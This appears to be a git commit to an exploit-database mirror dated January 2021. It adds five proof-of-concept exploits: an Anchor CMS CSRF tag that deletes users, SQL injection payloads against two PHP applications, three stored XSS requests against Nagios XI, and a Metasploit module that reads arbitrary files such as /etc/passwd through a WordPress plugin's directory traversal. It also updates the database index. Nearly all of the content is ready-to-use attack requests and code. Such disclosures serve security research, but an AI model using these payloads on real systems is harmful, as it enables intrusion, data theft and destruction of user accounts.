DB: 2021-01-22
5 changes to exploits/shellcodes Online Documents Sharing Platform 1.0 - 'user' SQL Injection Apartment Visitors Management System 1.0 - 'email' SQL Injection Nagios XI 5.7.5 - Multiple Persistent Cross-Site Scripting Wordpress Plugin Simple Job Board 2.9.3 - Authenticated File Read (Metasploit) Anchor CMS 0.12.7 - CSRF (Delete user)
This commit is contained in:
parent
d65226277c
commit
aa473257e9
6 changed files with 292 additions and 0 deletions
19
exploits/multiple/webapps/49451.html
Normal file
19
exploits/multiple/webapps/49451.html
Normal file
|
@ -0,0 +1,19 @@
|
||||||
|
# Exploit Title: Anchor CMS 0.12.7 - CSRF (Delete user)
|
||||||
|
# Exploit Author: Ninad Mishra
|
||||||
|
# Vendor Homepage: https://anchorcms.com/
|
||||||
|
# Software Link: https://anchorcms.com/download
|
||||||
|
# Version: 0.12.7
|
||||||
|
# CVE : CVE-2020-23342
|
||||||
|
|
||||||
|
|
||||||
|
###PoC
|
||||||
|
the cms uses get method to perform sensitive actions hence users can be deleted via exploit.html
|
||||||
|
|
||||||
|
================================
|
||||||
|
<img src="http://target/anchor/index.php/admin/users/delete/21">
|
||||||
|
================================
|
||||||
|
Where (21) is the user id .
|
||||||
|
|
||||||
|
When admin clicks on exploit.html link
|
||||||
|
|
||||||
|
User with id 21 will be deleted
|
50
exploits/php/webapps/49447.txt
Normal file
50
exploits/php/webapps/49447.txt
Normal file
|
@ -0,0 +1,50 @@
|
||||||
|
# Exploit Title: Online Documents Sharing Platform 1.0 - 'user' SQL Injection
|
||||||
|
# Date: 21.01.2021
|
||||||
|
# Exploit Author: CANKAT ÇAKMAK
|
||||||
|
# Vendor Homepage: https://www.sourcecodester.com/php/14653/online-documents-sharing-platform-php-full-source-code.html
|
||||||
|
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/notes.zip
|
||||||
|
# Version: V1.0
|
||||||
|
# Tested on: Windows 10
|
||||||
|
|
||||||
|
#Description: The 'user' parameterer is vulnerable to error-based and time-based SQL Injection.
|
||||||
|
|
||||||
|
----------------------------------------------------
|
||||||
|
|
||||||
|
POST /path/login.php HTTP/1.1
|
||||||
|
Host: test.com
|
||||||
|
Content-Length: 29
|
||||||
|
Cache-Control: max-age=0
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
Origin: http://test.com
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
|
||||||
|
(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
|
||||||
|
Accept:
|
||||||
|
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||||
|
Sec-Fetch-Site: same-origin
|
||||||
|
Sec-Fetch-Mode: navigate
|
||||||
|
Sec-Fetch-User: ?1
|
||||||
|
Sec-Fetch-Dest: document
|
||||||
|
Referer: http://test.com/path/login.php
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
|
||||||
|
|
||||||
|
user=%27&pass=%27&login=login
|
||||||
|
|
||||||
|
----------------------------------------------------
|
||||||
|
|
||||||
|
#PoC:
|
||||||
|
|
||||||
|
Parameter: user (POST)
|
||||||
|
Type: error-based
|
||||||
|
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
|
||||||
|
GROUP BY clause (FLOOR)
|
||||||
|
Payload: user=' AND (SELECT 2047 FROM(SELECT
|
||||||
|
COUNT(*),CONCAT(0x7176706a71,(SELECT
|
||||||
|
(ELT(2047=2047,1))),0x7162787071,FLOOR(RAND(0)*2))x FROM
|
||||||
|
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NRPK&pass='&login=login
|
||||||
|
|
||||||
|
Type: time-based blind
|
||||||
|
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
||||||
|
Payload: user=' AND (SELECT 2110 FROM (SELECT(SLEEP(5)))pSYW)--
|
||||||
|
HnhM&pass='&login=login
|
42
exploits/php/webapps/49448.txt
Normal file
42
exploits/php/webapps/49448.txt
Normal file
|
@ -0,0 +1,42 @@
|
||||||
|
# Exploit Title: Apartment Visitors Management System 1.0 - 'email' SQL Injection
|
||||||
|
# Date: 20.01.2021
|
||||||
|
# Exploit Author: CANKAT ÇAKMAK
|
||||||
|
# Vendor Homepage: https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/
|
||||||
|
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10395
|
||||||
|
# Version: V1.0
|
||||||
|
# Tested on: Windows 10
|
||||||
|
|
||||||
|
----------------------------------------------------
|
||||||
|
|
||||||
|
POST /avms/forgot-password.php HTTP/1.1
|
||||||
|
Host: test.com
|
||||||
|
Content-Length: 42
|
||||||
|
Cache-Control: max-age=0
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
Origin: test.com
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
|
||||||
|
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88
|
||||||
|
Safari/537.36
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||||
|
Sec-Fetch-Site: same-origin
|
||||||
|
Sec-Fetch-Mode: navigate
|
||||||
|
Sec-Fetch-User: ?1
|
||||||
|
Sec-Fetch-Dest: document
|
||||||
|
Referer: http://test.com/avms/forgot-password.php
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
|
||||||
|
|
||||||
|
|
||||||
|
email=test%40gmail.com&contactno=1&submit=
|
||||||
|
|
||||||
|
----------------------------------------------------
|
||||||
|
|
||||||
|
poC:
|
||||||
|
|
||||||
|
|
||||||
|
Parameter: email (POST)
|
||||||
|
Type: time-based blind
|
||||||
|
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
||||||
|
Payload: email=test@gmail.com' AND (SELECT 2600 FROM
|
||||||
|
(SELECT(SLEEP(5)))jpeB) AND 'WVFv'='WVFv&contactno=1&submit=
|
87
exploits/php/webapps/49449.txt
Normal file
87
exploits/php/webapps/49449.txt
Normal file
|
@ -0,0 +1,87 @@
|
||||||
|
# Exploit Title: Nagios XI 5.7.5 - Multiple Persistent Cross-Site Scripting
|
||||||
|
# Date: 1-20-2021
|
||||||
|
# Exploit Author: Matthew Aberegg
|
||||||
|
# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
|
||||||
|
# Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/
|
||||||
|
# Software Link: https://www.nagios.com/downloads/nagios-xi/
|
||||||
|
# Version: Nagios XI 5.7.5
|
||||||
|
# Tested on: Ubuntu 18.04
|
||||||
|
|
||||||
|
|
||||||
|
# Vulnerability Details
|
||||||
|
# Description : A persistent cross-site scripting vulnerability exists in the "My Tools" functionality of Nagios XI.
|
||||||
|
# Vulnerable Parameter : url
|
||||||
|
|
||||||
|
|
||||||
|
# POC
|
||||||
|
# Exploit Details : The following request will create a tool with an XSS payload. Click on the URL link for the malicious tool to trigger the payload.
|
||||||
|
|
||||||
|
POST /nagiosxi/tools/mytools.php HTTP/1.1
|
||||||
|
Host: TARGET
|
||||||
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Content-Length: 145
|
||||||
|
Origin: http://TARGET
|
||||||
|
Connection: close
|
||||||
|
Referer: http://TARGET/nagiosxi/tools/mytools.php?edit=1
|
||||||
|
Cookie: nagiosxi=5kbmap730ic023ig2q0bpdefas
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
|
||||||
|
nsp=a2569a2507c7c69600769ca7388614b4264ab9479c560ac62bbc5f9fd76c2524&update=1&id=-1&name=XSS+Test&url=%27+onclick%3D%27alert%281%29&updateButton=
|
||||||
|
|
||||||
|
|
||||||
|
############################################################################################################
|
||||||
|
|
||||||
|
# Vulnerability Details
|
||||||
|
# Description : A persistent cross-site scripting vulnerability exists in "Business Process Intelligence" functionality of Nagios XI.
|
||||||
|
# Vulnerable Parameter : groupID
|
||||||
|
|
||||||
|
|
||||||
|
# POC
|
||||||
|
# Exploit Details : The following request will create a BPI group with an XSS payload. Click on the Group ID for the malicious BPI group to trigger the payload.
|
||||||
|
|
||||||
|
POST /nagiosxi/includes/components/nagiosbpi/index.php?cmd=add HTTP/1.1
|
||||||
|
Host: TARGET
|
||||||
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Content-Length: 186
|
||||||
|
Origin: http://TARGET
|
||||||
|
Connection: close
|
||||||
|
Referer: http://TARGET/nagiosxi/includes/components/nagiosbpi/index.php?cmd=add&tab=add
|
||||||
|
Cookie: nagiosxi=6lg3d4mqgsgsllclli1hch00td
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
|
||||||
|
groupID=%27onclick%3Dalert%281%29%2F%2F&groupType=default&groupTitle=TEST&groupDesc=&groupInfoUrl=&groupPrimary=1&groupWarn=90&groupCrit=80&groupDisplay=2&addSubmitted=true
|
||||||
|
|
||||||
|
|
||||||
|
############################################################################################################
|
||||||
|
|
||||||
|
# Vulnerability Details
|
||||||
|
# Description : A persistent cross-site scripting vulnerability exists in "Views" functionality of Nagios XI.
|
||||||
|
# Vulnerable Parameter : url
|
||||||
|
|
||||||
|
|
||||||
|
# POC
|
||||||
|
# Exploit Details : The following request will create a view with an XSS payload. Click on the malicious view to trigger the payload.
|
||||||
|
|
||||||
|
POST /nagiosxi/ajaxhelper.php HTTP/1.1
|
||||||
|
Host: TARGET
|
||||||
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0
|
||||||
|
Accept: */*
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
X-Requested-With: XMLHttpRequest
|
||||||
|
Content-Length: 147
|
||||||
|
Origin: http://TARGET
|
||||||
|
Connection: close
|
||||||
|
Referer: http://TARGET/nagiosxi/account/
|
||||||
|
Cookie: nagiosxi=6lg3d4mqgsgsllclli1hch00td
|
||||||
|
|
||||||
|
cmd=addview&url=javascript:alert(1)&title=TESTVIEW&submitButton=&nsp=c97136052a4b8d7d535c7d4a7a32389a5882c65cb34f2c36b849f72af52b2056
|
89
exploits/php/webapps/49450.rb
Executable file
89
exploits/php/webapps/49450.rb
Executable file
|
@ -0,0 +1,89 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: https://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
class MetasploitModule < Msf::Auxiliary
|
||||||
|
include Msf::Auxiliary::Report
|
||||||
|
include Msf::Exploit::Remote::HTTP::Wordpress
|
||||||
|
include Msf::Auxiliary::Scanner
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'Simple JobBoard Authenticated File Read Vulnerability',
|
||||||
|
'Description' => %q{
|
||||||
|
This module exploits an authenticated directory traversal vulnerability in WordPress plugin 'Simple JobBoard ' < 2.9.3,
|
||||||
|
allowing arbitrary file read with the web server privileges.
|
||||||
|
},
|
||||||
|
'Author' =>
|
||||||
|
[
|
||||||
|
'Arcangelo Saracino', # Vulnerability discovery
|
||||||
|
'Hoa Nguyen - Suncsr Team', # Metasploit module
|
||||||
|
],
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
['CVE', '2020-35749'],
|
||||||
|
['WPVDB', 'eed3bd69-2faf-4bc9-915c-c36211ef9e2d'],
|
||||||
|
['URL','https://arkango.github.io/CVE-2020/CVE-2020-35749%20DIr.%20Traversal%20Simple%20Board%20Job%20Wordpress%20plugin.html']
|
||||||
|
],
|
||||||
|
'DisclosureDate' => 'Jan 15 2021'))
|
||||||
|
|
||||||
|
register_options([
|
||||||
|
OptString.new('FILEPATH',[true,'The path to the file to read','/etc/passwd']),
|
||||||
|
OptString.new('USERNAME',[true,'The WordPress username to authenticate with']),
|
||||||
|
OptString.new('PASSWORD',[true,'The Wordpress password to authenticate with']),
|
||||||
|
OptInt.new('DEPTH',[true,'Traversal Depth (to reach the root folder',8]),
|
||||||
|
])
|
||||||
|
end
|
||||||
|
|
||||||
|
def username
|
||||||
|
datastore['USERNAME']
|
||||||
|
end
|
||||||
|
|
||||||
|
def password
|
||||||
|
datastore['PASSWORD']
|
||||||
|
end
|
||||||
|
|
||||||
|
def check
|
||||||
|
cookie = wordpress_login(username,password)
|
||||||
|
if cookie.nil?
|
||||||
|
store_valid_credential(user: username, private: password, proof: cookie)
|
||||||
|
return CheckCode::Safe
|
||||||
|
end
|
||||||
|
CheckCode::Appears
|
||||||
|
end
|
||||||
|
|
||||||
|
def run_host(ip)
|
||||||
|
cookie = wordpress_login(username, password)
|
||||||
|
traversal = '../' * datastore['DEPTH']
|
||||||
|
filename = datastore['FILEPATH']
|
||||||
|
filename = filename[1, filename.length] if filename =~ /^\//
|
||||||
|
|
||||||
|
res = send_request_cgi({
|
||||||
|
'cookie' => cookie,
|
||||||
|
'method' => 'GET',
|
||||||
|
'uri' => normalize_uri(target_uri.path,'wp-admin',''),
|
||||||
|
'vars_get' =>
|
||||||
|
{
|
||||||
|
'post' => 'application_id',
|
||||||
|
'action' => 'edit',
|
||||||
|
'sjb_file' => "#{traversal}#{filename}"
|
||||||
|
}
|
||||||
|
})
|
||||||
|
|
||||||
|
fail_with Failure::Unreachable, 'Connection failed' unless res fail_with Failure::NotVulnerable, 'Connection failed. Nothingn was downloaded' if res.code != 200
|
||||||
|
fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero?
|
||||||
|
print_good('Downloading file ...')
|
||||||
|
print_line("\n#{res.body}\n")
|
||||||
|
fname = datastore['FILEPATH']
|
||||||
|
path = store_loot(
|
||||||
|
'Simple_JobBoard.traversal',
|
||||||
|
'text/plain',
|
||||||
|
ip,
|
||||||
|
res.body,
|
||||||
|
fname
|
||||||
|
)
|
||||||
|
print_good("File save in: #{path}")
|
||||||
|
end
|
||||||
|
end
|
|
@ -25890,6 +25890,7 @@ id,file,description,date,author,type,platform,port
|
||||||
49443,exploits/multiple/webapps/49443.py,"ChurchRota 2.6.4 - RCE (Authenticated)",2021-01-20,"Rob McCarthy",webapps,multiple,
|
49443,exploits/multiple/webapps/49443.py,"ChurchRota 2.6.4 - RCE (Authenticated)",2021-01-20,"Rob McCarthy",webapps,multiple,
|
||||||
49444,exploits/multiple/webapps/49444.txt,"Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS",2021-01-20,omurugur,webapps,multiple,
|
49444,exploits/multiple/webapps/49444.txt,"Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS",2021-01-20,omurugur,webapps,multiple,
|
||||||
49445,exploits/php/webapps/49445.py,"Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)",2021-01-20,"Richard Jones",webapps,php,
|
49445,exploits/php/webapps/49445.py,"Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)",2021-01-20,"Richard Jones",webapps,php,
|
||||||
|
49447,exploits/php/webapps/49447.txt,"Online Documents Sharing Platform 1.0 - 'user' SQL Injection",2021-01-21,"CANKAT ÇAKMAK",webapps,php,
|
||||||
49433,exploits/php/webapps/49433.txt,"Alumni Management System 1.0 - _Last Name field in Registration page_ Stored XSS",2021-01-15,"Siva Rajendran",webapps,php,
|
49433,exploits/php/webapps/49433.txt,"Alumni Management System 1.0 - _Last Name field in Registration page_ Stored XSS",2021-01-15,"Siva Rajendran",webapps,php,
|
||||||
49434,exploits/php/webapps/49434.py,"E-Learning System 1.0 - Authentication Bypass & RCE POC",2021-01-15,"Himanshu Shukla",webapps,php,
|
49434,exploits/php/webapps/49434.py,"E-Learning System 1.0 - Authentication Bypass & RCE POC",2021-01-15,"Himanshu Shukla",webapps,php,
|
||||||
49435,exploits/multiple/webapps/49435.rb,"Netsia SEBA+ 0.16.1 - Authentication Bypass and Add Root User (Metasploit)",2021-01-15,AkkuS,webapps,multiple,
|
49435,exploits/multiple/webapps/49435.rb,"Netsia SEBA+ 0.16.1 - Authentication Bypass and Add Root User (Metasploit)",2021-01-15,AkkuS,webapps,multiple,
|
||||||
|
@ -43644,3 +43645,7 @@ id,file,description,date,author,type,platform,port
|
||||||
49436,exploits/hardware/webapps/49436.py,"Cisco UCS Manager 2.2(1d) - Remote Command Execution",2021-01-18,liquidsky,webapps,hardware,
|
49436,exploits/hardware/webapps/49436.py,"Cisco UCS Manager 2.2(1d) - Remote Command Execution",2021-01-18,liquidsky,webapps,hardware,
|
||||||
49437,exploits/multiple/webapps/49437.txt,"Xwiki CMS 12.10.2 - Cross Site Scripting (XSS)",2021-01-18,"Karan Keswani",webapps,multiple,
|
49437,exploits/multiple/webapps/49437.txt,"Xwiki CMS 12.10.2 - Cross Site Scripting (XSS)",2021-01-18,"Karan Keswani",webapps,multiple,
|
||||||
49438,exploits/hardware/webapps/49438.py,"Inteno IOPSYS 3.16.4 - root filesystem access via sambashare (Authenticated)",2021-01-18,"Henrik Pedersen",webapps,hardware,
|
49438,exploits/hardware/webapps/49438.py,"Inteno IOPSYS 3.16.4 - root filesystem access via sambashare (Authenticated)",2021-01-18,"Henrik Pedersen",webapps,hardware,
|
||||||
|
49448,exploits/php/webapps/49448.txt,"Apartment Visitors Management System 1.0 - 'email' SQL Injection",2021-01-21,"CANKAT ÇAKMAK",webapps,php,
|
||||||
|
49449,exploits/php/webapps/49449.txt,"Nagios XI 5.7.5 - Multiple Persistent Cross-Site Scripting",2021-01-21,"Matthew Aberegg",webapps,php,
|
||||||
|
49450,exploits/php/webapps/49450.rb,"Wordpress Plugin Simple Job Board 2.9.3 - Authenticated File Read (Metasploit)",2021-01-21,"SunCSR Team",webapps,php,
|
||||||
|
49451,exploits/multiple/webapps/49451.html,"Anchor CMS 0.12.7 - CSRF (Delete user)",2021-01-21,"Ninad Mishra",webapps,multiple,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue